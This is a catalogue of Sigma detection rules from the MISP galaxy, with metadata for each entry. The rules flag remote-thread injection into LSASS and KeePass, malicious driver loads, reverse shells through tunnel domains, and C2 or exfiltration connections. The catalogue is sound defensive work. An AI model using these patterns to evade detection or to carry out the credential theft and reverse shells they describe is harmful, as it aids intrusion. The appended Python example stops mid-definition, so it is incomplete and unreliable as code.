tags ['attack.credential_access', 'attack.s0005', 'attack.t1003.001']

Rare Remote Thread Creation By Uncommon Source Image

Detects uncommon processes creating remote threads.

Internal MISP references

UUID 02d1d718-dd13-41af-989d-ea85c7fab93f which can be used as unique global reference for Rare Remote Thread Creation By Uncommon Source Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Perez Diego (@darkquassar), oscd.community
creation_date 2019/10/27
falsepositive ['This rule is best put in testing first in order to create a baseline that reflects the data in your environment.']
filename create_remote_thread_win_susp_relevant_source_image.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1055']

Remote Thread Creation In Mstsc.Exe From Suspicious Location

Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials.

Internal MISP references

UUID c0aac16a-b1e7-4330-bab0-3c27bb4987c7 which can be used as unique global reference for Remote Thread Creation In Mstsc.Exe From Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/28
falsepositive ['Unknown']
filename create_remote_thread_win_mstsc_susp_location.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.credential_access']

Remote Thread Creation By Uncommon Source Image

Detects uncommon processes creating remote threads.

Internal MISP references

UUID 66d31e5f-52d6-40a4-9615-002d3789a119 which can be used as unique global reference for Remote Thread Creation By Uncommon Source Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Perez Diego (@darkquassar), oscd.community
creation_date 2019/10/27
falsepositive ['This rule is best put in testing first in order to create a baseline that reflects the data in your environment.']
filename create_remote_thread_win_susp_uncommon_source_image.yml
level medium
logsource.category create_remote_thread
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1055']

Remote Thread Creation Via PowerShell In Uncommon Target

Detects the creation of a remote thread from a PowerShell process in an uncommon target process

Internal MISP references

UUID 99b97608-3e21-4bfe-8217-2a127c396a0e which can be used as unique global reference for Remote Thread Creation Via PowerShell In Uncommon Target in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/06/25
falsepositive ['Unknown']
filename create_remote_thread_win_powershell_susp_targets.yml
level medium
logsource.category create_remote_thread
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218.011', 'attack.t1059.001']

Remote Thread Created In KeePass.EXE

Detects remote thread creation in "KeePass.exe", which could indicate potential password dumping activity

Internal MISP references

UUID 77564cc2-7382-438b-a7f6-395c2ae53b9a which can be used as unique global reference for Remote Thread Created In KeePass.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timon Hackenjos
creation_date 2022/04/22
falsepositive ['Unknown']
filename create_remote_thread_win_keepass.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.005']

HackTool - Potential CobaltStrike Process Injection

Detects a potential remote thread creation with certain characteristics which are typical for Cobalt Strike beacons

Internal MISP references

UUID 6309645e-122d-4c5b-bb2b-22e4f9c2fa42 which can be used as unique global reference for HackTool - Potential CobaltStrike Process Injection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community
creation_date 2018/11/30
falsepositive ['Unknown']
filename create_remote_thread_win_hktl_cobaltstrike.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055.001']

Remote Thread Creation Ttdinject.exe Proxy

Detects a remote thread creation by Ttdinject.exe used as a proxy

Internal MISP references

UUID c15e99a3-c474-48ab-b9a7-84549a7a9d16 which can be used as unique global reference for Remote Thread Creation Ttdinject.exe Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/16
falsepositive ['Unknown']
filename create_remote_thread_win_ttdinjec.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']

Remote Thread Creation In Uncommon Target Image

Detects uncommon target processes for remote thread creation

Internal MISP references

UUID a1a144b7-5c9b-4853-a559-2172be8d4a03 which can be used as unique global reference for Remote Thread Creation In Uncommon Target Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/16
falsepositive ['Unknown']
filename create_remote_thread_win_susp_uncommon_target_image.yml
level medium
logsource.category create_remote_thread
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055.003']

Potential Credential Dumping Attempt Via PowerShell Remote Thread

Detects remote thread creation by PowerShell processes into "lsass.exe"

Internal MISP references

UUID fb656378-f909-47c1-8747-278bf09f4f4f which can be used as unique global reference for Potential Credential Dumping Attempt Via PowerShell Remote Thread in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova
creation_date 2020/10/06
falsepositive ['Unknown']
filename create_remote_thread_win_powershell_lsass.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

HackTool - CACTUSTORCH Remote Thread Creation

Detects remote thread creation from CACTUSTORCH as described in references.

Internal MISP references

UUID 2e4e488a-6164-4811-9ea1-f960c7359c40 which can be used as unique global reference for HackTool - CACTUSTORCH Remote Thread Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SBousseaden (detection), Thomas Patzke (rule)
creation_date 2019/02/01
falsepositive ['Unknown']
filename create_remote_thread_win_hktl_cactustorch.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1055.012', 'attack.t1059.005', 'attack.t1059.007', 'attack.t1218.005']

PUA - Process Hacker Driver Load

Detects driver load of the Process Hacker tool

Internal MISP references

UUID 67add051-9ee7-4ad3-93ba-42935615ae8d which can be used as unique global reference for PUA - Process Hacker Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/11/16
falsepositive ['Legitimate use of process hacker or system informer by developers or system administrators']
filename driver_load_win_pua_process_hacker.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'cve.2021.21551', 'attack.t1543']

Malicious Driver Load By Name

Detects loading of known malicious drivers via the file name of the drivers.

Internal MISP references

UUID 39b64854-5497-4b57-a448-40977b8c9679 which can be used as unique global reference for Malicious Driver Load By Name in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/03
falsepositive ["False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", 'If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)']
filename driver_load_win_mal_drivers_names.yml
level medium
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003', 'attack.t1068']

Driver Load From A Temporary Directory

Detects a driver load from a temporary directory

Internal MISP references

UUID 2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75 which can be used as unique global reference for Driver Load From A Temporary Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/02/12
falsepositive ['There is a relevant set of false positives depending on applications in the environment']
filename driver_load_win_susp_temp_use.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']

Vulnerable HackSys Extreme Vulnerable Driver Load

Detects the load of the HackSys Extreme Vulnerable Driver, an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at the kernel level, which is often abused by threat actors

Internal MISP references

UUID 295c9289-acee-4503-a571-8eacaef36b28 which can be used as unique global reference for Vulnerable HackSys Extreme Vulnerable Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/18
falsepositive ['Unlikely']
filename driver_load_win_vuln_hevd_driver.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003']

PUA - System Informer Driver Load

Detects driver load of the System Informer tool

Internal MISP references

UUID 10cb6535-b31d-4512-9962-513dcbc42cc1 which can be used as unique global reference for PUA - System Informer Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/05/08
falsepositive ['System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly']
filename driver_load_win_pua_system_informer.yml
level medium
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543']

Vulnerable Driver Load By Name

Detects the load of known vulnerable drivers via the file name of the drivers.

Internal MISP references

UUID 72cd00d6-490c-4650-86ff-1d11f491daa1 which can be used as unique global reference for Vulnerable Driver Load By Name in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/03
falsepositive ["False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", 'If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)']
filename driver_load_win_vuln_drivers_names.yml
level low
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003', 'attack.t1068']

Vulnerable WinRing0 Driver Load

Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation

Internal MISP references

UUID 1a42dfa6-6cb2-4df9-9b48-295be477e835 which can be used as unique global reference for Vulnerable WinRing0 Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/26
falsepositive ['Unknown']
filename driver_load_win_vuln_winring0_driver.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003']

WinDivert Driver Load

Detects the load of the WinDivert driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows

Internal MISP references

UUID 679085d5-f427-4484-9f58-1dc30a7c426d which can be used as unique global reference for WinDivert Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/30
falsepositive ['Legitimate WinDivert driver usage']
filename driver_load_win_windivert.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.collection', 'attack.defense_evasion', 'attack.t1599.001', 'attack.t1557.001']

Malicious Driver Load

Detects loading of known malicious drivers via their hash.

Internal MISP references

UUID 05296024-fe8a-4baf-8f3d-9a5f5624ceb2 which can be used as unique global reference for Malicious Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/18
falsepositive ['Unknown']
filename driver_load_win_mal_drivers.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003', 'attack.t1068']

Vulnerable Driver Load

Detects loading of known vulnerable drivers via their hash.

Internal MISP references

UUID 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8 which can be used as unique global reference for Vulnerable Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/18
falsepositive ['Unknown']
filename driver_load_win_vuln_drivers.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003', 'attack.t1068']

Network Connection Initiated To Visual Studio Code Tunnels Domain

Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Internal MISP references

UUID 4b657234-038e-4ad5-997c-4be42340bce4 which can be used as unique global reference for Network Connection Initiated To Visual Studio Code Tunnels Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kamran Saifullah
creation_date 2023/11/20
falsepositive ['Legitimate use of Visual Studio Code tunnel will also trigger this.']
filename net_connection_win_vscode_tunnel_connection.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.001']

Connection Initiated Via Certutil.EXE

Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.

Internal MISP references

UUID 0dba975d-a193-4ed1-a067-424df57570d1 which can be used as unique global reference for Connection Initiated Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/09/02
falsepositive ['Unknown']
filename net_connection_win_certutil_initiated_connection.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

Network Connection Initiated By AddinUtil.EXE

Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.

Internal MISP references

UUID 5205613d-2a63-4412-a895-3a2458b587b3 which can be used as unique global reference for Network Connection Initiated By AddinUtil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
creation_date 2023/09/18
falsepositive ['Unknown']
filename net_connection_win_addinutil.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Python Initiated Connection

Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.

Internal MISP references

UUID bef0bc5a-b9ae-425d-85c6-7b2d705980c6 which can be used as unique global reference for Python Initiated Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying.']
filename net_connection_win_python.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.discovery', 'attack.t1046']

Potential Remote PowerShell Session Initiated

Detects a process that initiated a network connection over port 5985 or 5986 from an account other than Network Service. This could indicate a remote PowerShell (WinRM) session.

Internal MISP references

UUID c539afac-c12a-46ed-b1bd-5a5567c9f045 which can be used as unique global reference for Potential Remote PowerShell Session Initiated in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/09/12
falsepositive ['Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.', 'Network Service user name of a not-covered localization']
filename net_connection_win_susp_remote_powershell_session.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.lateral_movement', 'attack.t1021.006']

Outbound Network Connection To Public IP Via Winlogon

Detects a "winlogon.exe" process that initiates network communications with public IP addresses.

Internal MISP references

UUID 7610a4ea-c06d-495f-a2ac-0a696abcfd3b which can be used as unique global reference for Outbound Network Connection To Public IP Via Winlogon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @securepeacock, SCYTHE @scythe_io
creation_date 2023/04/28
falsepositive ['Communication to other corporate systems that use IP addresses from public address spaces']
filename net_connection_win_winlogon_net_connections.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.command_and_control', 'attack.t1218.011']

Script Initiated Connection to Non-Local Network

Detects a script interpreter (wscript/cscript) opening a network connection to a non-local network. Adversaries may use scripts to download malicious payloads.

Internal MISP references

UUID 992a6cae-db6a-43c8-9cec-76d7195c96fc which can be used as unique global reference for Script Initiated Connection to Non-Local Network in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/08/28
falsepositive ['Legitimate scripts']
filename net_connection_win_script_wan.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

Suspicious Network Connection Binary No CommandLine

Detects suspicious network connections made by a well-known Windows binary run with no command line parameters.

Internal MISP references

UUID 20384606-a124-4fec-acbb-8bd373728613 which can be used as unique global reference for Suspicious Network Connection Binary No CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/03
falsepositive ['Unknown']
filename net_connection_win_susp_binary_no_cmdline.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion']

Potentially Suspicious Wuauclt Network Connection

Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy code execution and make network connections. An attacker could easily have the loaded DLL spawn a new process and inject into it to proxy the network connection, which would bypass this rule.

Internal MISP references

UUID c649a6c7-cd8c-4a78-9c04-000fc76df954 which can be used as unique global reference for Potentially Suspicious Wuauclt Network Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/12
falsepositive ['Unknown']
filename net_connection_win_wuauclt_network_connection.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Rundll32 Internet Connection

Detects a rundll32 process that communicates with public IP addresses.

Internal MISP references

UUID cdc8da7d-c303-42f8-b08c-b4ab47230263 which can be used as unique global reference for Rundll32 Internet Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/11/04
falsepositive ['Communication to other corporate systems that use IP addresses from public address spaces']
filename net_connection_win_rundll32_net_connections.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011', 'attack.execution']

Office Application Initiated Network Connection Over Uncommon Ports

Detects an office suite application (Word, Excel, PowerPoint, Outlook) communicating with target systems over uncommon ports.

Internal MISP references

UUID 3b5ba899-9842-4bc2-acc2-12308498bf42 which can be used as unique global reference for Office Application Initiated Network Connection Over Uncommon Ports in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/12
falsepositive ['Other ports can be used, apply additional filters accordingly']
filename net_connection_win_office_uncommon_ports.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.command_and_control']

Network Connection Initiated By Regsvr32.EXE

Detects a network connection initiated by "Regsvr32.exe".

Internal MISP references

UUID c7e91a02-d771-4a6d-a700-42587e0b1095 which can be used as unique global reference for Network Connection Initiated By Regsvr32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dmitriy Lifanov, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename net_connection_win_regsvr32_network_activity.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.execution', 'attack.t1559.001', 'attack.defense_evasion', 'attack.t1218.010']

Microsoft Sync Center Suspicious Network Connections

Detects suspicious connections from Microsoft Sync Center to non-private IPs.

Internal MISP references

UUID 9f2cc74d-78af-4eb2-bb64-9cd1d292b87b which can be used as unique global reference for Microsoft Sync Center Suspicious Network Connections in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim
creation_date 2022/04/28
falsepositive ['Unknown']
filename net_connection_win_susp_outbound_mobsync_connection.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.t1055', 'attack.t1218', 'attack.execution', 'attack.defense_evasion']

RDP to HTTP or HTTPS Target Ports

Detects svchost hosting RDP termsvcs communicating with target systems on TCP port 80 or 443.

Internal MISP references

UUID b1e5da3b-ca8e-4adf-915c-9921f3d85481 which can be used as unique global reference for RDP to HTTP or HTTPS Target Ports in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/29
falsepositive ['Unknown']
filename net_connection_win_rdp_to_http.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572', 'attack.lateral_movement', 'attack.t1021.001', 'car.2013-07-002']

Communication To Uncommon Destination Ports

Detects programs that connect to uncommon destination ports.

Internal MISP references

UUID 6d8c3d20-a5e1-494f-8412-4571d716cf5c which can be used as unique global reference for Communication To Uncommon Destination Ports in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/19
falsepositive ['Unknown']
filename net_connection_win_susp_malware_callback_ports_uncommon.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.persistence', 'attack.command_and_control', 'attack.t1571']

Suspicious Outbound SMTP Connections

Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Internal MISP references

UUID 9976fa64-2804-423c-8a5b-646ade840773 which can be used as unique global reference for Suspicious Outbound SMTP Connections in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['Other SMTP tools']
filename net_connection_win_susp_outbound_smtp_connections.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048.003']

Network Communication With Crypto Mining Pool

Detects initiated network connections to crypto mining pools.

Internal MISP references

UUID fa5b1358-b040-4403-9868-15f7d9ab6329 which can be used as unique global reference for Network Communication With Crypto Mining Pool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/10/26
falsepositive ['Unlikely']
filename net_connection_win_susp_crypto_mining_pools.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.impact', 'attack.t1496']

Office Application Initiated Network Connection To Non-Local IP

Detects an office application (Word, Excel, PowerPoint) that initiates a network connection to a non-private IP address. This rule aims to detect traffic similar to that seen during exploitation of CVE-2021-42292. This rule will require an initial baseline and tuning specific to your organization.

Internal MISP references

UUID 75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84 which can be used as unique global reference for Office Application Initiated Network Connection To Non-Local IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton
creation_date 2021/11/10
falsepositive ['You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.', 'Office documents commonly have templates that refer to external addresses, like "sharepoint.ourcompany.com" may have to be tuned.', 'It is highly recommended to baseline your activity and tune out common business use cases.']
filename net_connection_win_office_outbound_non_local_ip.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.execution', 'attack.t1203']

Silenttrinity Stager Msbuild Activity

Detects possible remote connections to a Silenttrinity C2 server.

Internal MISP references

UUID 50e54b8d-ad73-43f8-96a1-5191685b17a4 which can be used as unique global reference for Silenttrinity Stager Msbuild Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kiran kumar s, oscd.community
creation_date 2020/10/11
falsepositive ['Unknown']
filename net_connection_win_silenttrinity_stager_msbuild_activity.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.execution', 'attack.t1127.001']

Outbound RDP Connections Over Non-Standard Tools

Detects non-standard tools initiating a connection over port 3389, indicating possible lateral movement. An initial baseline is required before deploying this rule, in order to exclude any third-party RDP tooling that you use.

Internal MISP references

UUID ed74fe75-7594-4b4b-ae38-e38e3fd2eb23 which can be used as unique global reference for Outbound RDP Connections Over Non-Standard Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2019/05/15
falsepositive ['Third party RDP tools']
filename net_connection_win_rdp_outbound_over_non_standard_tools.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.001', 'car.2013-07-002']

Suspicious Wordpad Outbound Connections

Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms.

Internal MISP references

UUID 786cdae8-fefb-4eb2-9227-04e34060db01 which can be used as unique global reference for Suspicious Wordpad Outbound Connections in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/12
falsepositive ['Other ports can be used, apply additional filters accordingly']
filename net_connection_win_wordpad_uncommon_ports.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.command_and_control']

Network Connection Initiated To DevTunnels Domain

Detects network connections to DevTunnels domains initiated by a process on a system. Attackers can abuse this feature to establish a reverse shell or persistence on a machine.

Internal MISP references

UUID 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 which can be used as unique global reference for Network Connection Initiated To DevTunnels Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kamran Saifullah
creation_date 2023/11/20
falsepositive ['Legitimate use of Devtunnels will also trigger this.']
filename net_connection_win_susp_devtunnel_connection.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.001']

Script Initiated Connection

Detects a script interpreter (wscript/cscript) opening a network connection. Adversaries may use scripts to download malicious payloads.

Internal MISP references

UUID 08249dc0-a28d-4555-8ba5-9255a198e08c which can be used as unique global reference for Script Initiated Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/28
falsepositive ['Legitimate scripts']
filename net_connection_win_script.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

Suspicious Non-Browser Network Communication With Telegram API

Detects a non-browser process interacting with the Telegram API, which could indicate use of a covert C2 channel.

Internal MISP references

UUID c3dbbc9f-ef1d-470a-a90a-d343448d5875 which can be used as unique global reference for Suspicious Non-Browser Network Communication With Telegram API in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/19
falsepositive ['Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS etc.']
filename net_connection_win_telegram_api_non_browser_access.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102']

Uncommon Outbound Kerberos Connection

Detects uncommon outbound network activity over the default Kerberos port (88), indicating possible lateral movement or a first-stage privilege escalation via delegation.

Internal MISP references

UUID e54979bd-c5f9-4d6c-967b-a04b19ac4c74 which can be used as unique global reference for Uncommon Outbound Kerberos Connection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community
creation_date 2019/10/24
falsepositive ['Web Browsers and third party application might generate similar activity. An initial baseline is required.']
filename net_connection_win_susp_outbound_kerberos_connection.yml
level medium
logsource.category network_connection
logsource.product windows
tags ['attack.credential_access', 'attack.t1558', 'attack.lateral_movement', 'attack.t1550.003']

Msiexec.EXE Initiated Network Connection Over HTTP

Detects a network connection initiated by "Msiexec.exe" over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages.

Internal MISP references

UUID 8e5e38e4-5350-4c0b-895a-e872ce0dd54f which can be used as unique global reference for Msiexec.EXE Initiated Network Connection Over HTTP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/16
falsepositive ['Some rare installers were seen communicating with external servers for additional information. While it is a very rare occurrence, in some environments an initial baseline might be required.']
filename net_connection_win_msiexec_http.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007']

Suspicious Program Location with Network Connections

Detects programs with network connections running from suspicious file system locations.

Internal MISP references

UUID 7b434893-c57d-4f41-908d-6a17bf1ae98f which can be used as unique global reference for Suspicious Program Location with Network Connections in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton
creation_date 2017/03/19
falsepositive ['Unknown']
filename net_connection_win_susp_prog_location_network_connection.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

RDP Over Reverse SSH Tunnel

Detects svchost hosting RDP termsvcs communicating with the loopback address on TCP port 3389.

Internal MISP references

UUID 5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4 which can be used as unique global reference for RDP Over Reverse SSH Tunnel in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/02/16
falsepositive ['Unknown']
filename net_connection_win_rdp_reverse_tunnel.yml
level high
logsource.category network_connection
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572', 'attack.lateral_movement', 'attack.t1021.001', 'car.2013-07-002']
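
The remote PowerShell, RDP to HTTP/HTTPS, outbound RDP over non-standard tools and RDP over reverse SSH tunnel rules above are all port-based tests over the same network_connection event. The Python below is an added illustration of those tests and is not the rules' own detection logic nor code from the Sigma project or MISP. It runs over constructed Sysmon Event ID 3 style records; the set of localised "Network Service" names, the RDP client allowlist, and the use of source port 3389 as a stand-in for "svchost hosting termsvcs" (the event carries no service name) are assumptions made for this example.

```python
# Added example (not the Sigma rules themselves): the four port-based rules
# above as predicates over Sysmon Event ID 3 style records. Field names follow
# Sysmon; the account-name set, the RDP client allowlist and the use of source
# port 3389 as a stand-in for "svchost hosting termsvcs" are assumptions.
import ipaddress

# "Network Service" as Sysmon writes it in the User field. The name is localised,
# which is the second false positive listed on the remote PowerShell rule; the
# German and French forms are examples, extend the set for your locales.
NETWORK_SERVICE_NAMES = {
    "NT AUTHORITY\\NETWORK SERVICE",
    "NT-AUTORITÄT\\NETZWERKDIENST",
    "AUTORITE NT\\SERVICE RÉSEAU",
}
# RDP clients you expect to see; build this from a baseline as the rule advises.
KNOWN_RDP_CLIENTS = {"mstsc.exe"}

def image_basename(image: str) -> str:
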